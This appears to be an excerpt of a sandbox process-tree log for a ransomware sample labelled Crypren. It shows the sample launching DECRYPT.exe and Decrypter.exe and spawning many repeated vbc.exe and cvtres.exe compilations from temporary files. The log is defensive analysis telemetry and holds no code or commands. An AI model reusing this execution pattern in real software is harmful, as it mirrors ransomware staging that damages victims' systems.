-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Crypren.gen-c8582eee29280f9f356784fe4aac69364e010aa8dd928d7a18f6297cc8690bcc.exeHEUR-Trojan-Ransom.MSIL.Crypren.gen-c8582eee29280f9f356784fe4aac69364e010aa8dd928d7a18f6297cc8690bcc.exe3⤵PID:1180
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zwfshvjj.cmdline"4⤵PID:10280
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6158.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc431955A73F6F4B3297CC6C616C70C92.TMP"5⤵PID:9536
-
-
-
C:\Users\Admin\Desktop\00440\DECRYPT.exe"C:\Users\Admin\Desktop\00440\DECRYPT.exe"4⤵PID:10596
-
-
C:\Users\Admin\Desktop\00440\Decrypter.exe"C:\Users\Admin\Desktop\00440\Decrypter.exe"4⤵PID:1244
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fk18rnnq.cmdline"4⤵PID:7832
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71F2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB5FB6E27E430460AAAD97DB8575591E4.TMP"5⤵PID:15172
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\8furpsll.cmdline"4⤵PID:5040
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8098.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4531084229514894A156658A5D42B78.TMP"5⤵PID:9136
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\i4mfpbaq.cmdline"4⤵PID:1396
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES91AF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8125A6B7373F4C628DC6783AB03FD4F9.TMP"5⤵PID:8796
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\j152mfq0.cmdline"4⤵PID:9576
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA120.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc873786D5451F4E4DA942B3CAE71D956.TMP"5⤵PID:7956
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jcwopqy1.cmdline"4⤵PID:14564
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB256.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAF50E548E69E45D1862E1233363286E.TMP"5⤵PID:13708
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fuhr2u4w.cmdline"4⤵PID:12700
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD33.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB5A86DE8B5A24C43AFA9EC1A33BE6BF1.TMP"5⤵PID:14644
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\5ym_3qrr.cmdline"4⤵PID:10464
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5AF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6E159901B06945EB8A9E8D11B321ED75.TMP"5⤵PID:9680
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9m6sihqd.cmdline"4⤵PID:12396
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD12.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6DA54F149DA403DB8A7F18698A0C8A7.TMP"5⤵PID:15296
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lezy-zdu.cmdline"4⤵PID:10524
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD167.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1929EE1F196E405896E8D6D65D73319.TMP"5⤵PID:4520
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qwjtdl6b.cmdline"4⤵PID:11052
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7D0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc815F833DA09A487795E8577019C84BD.TMP"5⤵PID:14636
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pjc_bwtz.cmdline"4⤵PID:9244
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDEC5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFE0FBF07E57C49F0AA70A1C0835AD51.TMP"5⤵PID:14052
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\7dt1j2dh.cmdline"4⤵PID:9788
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE482.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc17B777D72C1497DA4772F402E5F4922.TMP"5⤵PID:9912
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cr4hhhml.cmdline"4⤵PID:12108
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEB19.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD6D3045D3564A0EB18C6671BB512425.TMP"5⤵PID:12328
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nceqdb76.cmdline"4⤵PID:216
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF4F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD30A64BA743E470F8C394A455DE8C17.TMP"5⤵PID:8796
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\alzr5omj.cmdline"4⤵PID:6560
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF49F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4D30C9C0D1C74070B2A09075B5943B.TMP"5⤵PID:6504
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yjz_k_nf.cmdline"4⤵PID:8400
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF962.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4DC319C3B4B4768B8A13B41C2329C9.TMP"5⤵PID:7892
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vklr--th.cmdline"4⤵PID:7572
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD88.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA956C25848B458BBD47A0A27CE6F735.TMP"5⤵PID:12048
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vpjmnvvk.cmdline"4⤵PID:12436
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES299.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3C5979E84A114FF49CE2D46A3E18D0AE.TMP"5⤵PID:9952
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4ytmmcjt.cmdline"4⤵PID:12264
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6AD11B71741A4AAF9FE379A11E83C545.TMP"5⤵PID:14472
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\a-jgsioh.cmdline"4⤵PID:10280
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc20FF233EDFBA495EB46C72DC6B1027CC.TMP"5⤵PID:8652
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\j2eenvs0.cmdline"4⤵PID:8484
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1585.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1E90288CC94D411084C15BDC13FB47D8.TMP"5⤵PID:5648
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\g-9igplh.cmdline"4⤵PID:9452
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1BBE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7CC12B9674CC48DF9EC91955A040E78A.TMP"5⤵PID:10168
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pjwqj21r.cmdline"4⤵PID:14308
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2023.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE10E2424FC04445AB03FEDD7C1C11A68.TMP"5⤵PID:4928
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dgu-5jt6.cmdline"4⤵PID:11912
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2592.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1834E88427B546AFAD2ADA4FF01651FD.TMP"5⤵PID:6580
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dkluxloc.cmdline"4⤵PID:10584
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A26.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5D7AD46543894B8A8DFB6C9518BF469F.TMP"5⤵PID:7384
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gt5js8kn.cmdline"4⤵PID:11732
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2FE3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc39FB950EBB3240F9BA3938767792D1E6.TMP"5⤵PID:8140
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\koa5szx4.cmdline"4⤵PID:15196
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3409.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5AFD1EB0F8E24D8D9CF39979FD583C9E.TMP"5⤵PID:6932
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\e8f2qesh.cmdline"4⤵PID:5248
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES392A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD6A44A3C96EF481C83B13BE74360F9E8.TMP"5⤵PID:6804
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yauusds4.cmdline"4⤵PID:5176
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES405D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE000D19F36CD4B39A117CA4A0CDC3FF.TMP"5⤵PID:11468
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hmqvd92b.cmdline"4⤵PID:11740
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES458E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEF41755EC95E4EDCA8D8F126C144A9F3.TMP"5⤵PID:13280
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\b8tlio2o.cmdline"4⤵PID:10588
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4AAE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5204F5D725194AEBA86B98E55051E749.TMP"5⤵PID:10356
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vng9-vzm.cmdline"4⤵PID:12196
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4FCF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc963D36892B0B4980962421D96BECADE.TMP"5⤵PID:6464
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ctqgvmgv.cmdline"4⤵PID:11836
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES54DF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2CF0966C11A64CF88A4A1F485ECF662B.TMP"5⤵PID:15136
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wffqpjtt.cmdline"4⤵PID:4692
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5964.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3822EBBA680C47C3B6F18D4065B174A.TMP"5⤵PID:14316
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wmamqxgd.cmdline"4⤵PID:9308
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E07.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9873AB96BEEF4F3AB6BD14DCAEB2BDCA.TMP"5⤵PID:8800
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cafgdzde.cmdline"4⤵PID:5976
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES62F9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA43C9DCB4BCD4DA28815DF9CA4F19B8.TMP"5⤵PID:7284
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mxj-1lbl.cmdline"4⤵PID:13708
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6848.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc90794619A6E146E1963DE4B245C3C952.TMP"5⤵PID:4428
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\eblff6rn.cmdline"4⤵PID:14672
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6EC0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc461D7E45F0CE4280A94F98ECF1217DA.TMP"5⤵PID:10776
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\x3dearqw.cmdline"4⤵PID:10264
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES742F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2180489AA51B4EB4B61EAC5459D7B2BD.TMP"5⤵PID:10288
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\daso_zqz.cmdline"4⤵PID:6212
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES797E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2505C2AE87C9446B9B76AB23B79559D.TMP"5⤵PID:13268
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\5ita3rzr.cmdline"4⤵PID:7672
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DB5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc79AF3616B83C4CFB8D2889134B07194.TMP"5⤵PID:8624
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\5zpu3y6d.cmdline"4⤵PID:9236
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8323.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc28C09109585E4C149B1C2E2E6D845D60.TMP"5⤵PID:9324
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ito05-t5.cmdline"4⤵PID:14068
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88B1.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4BA1F5B069F94545A540C246D692C2FC.TMP"5⤵PID:9644
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\uurthoin.cmdline"4⤵PID:12284
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D74.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC4A229A8417E42C38744FDA93BA2D627.TMP"5⤵PID:13256
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bubgihvc.cmdline"4⤵PID:10104
-
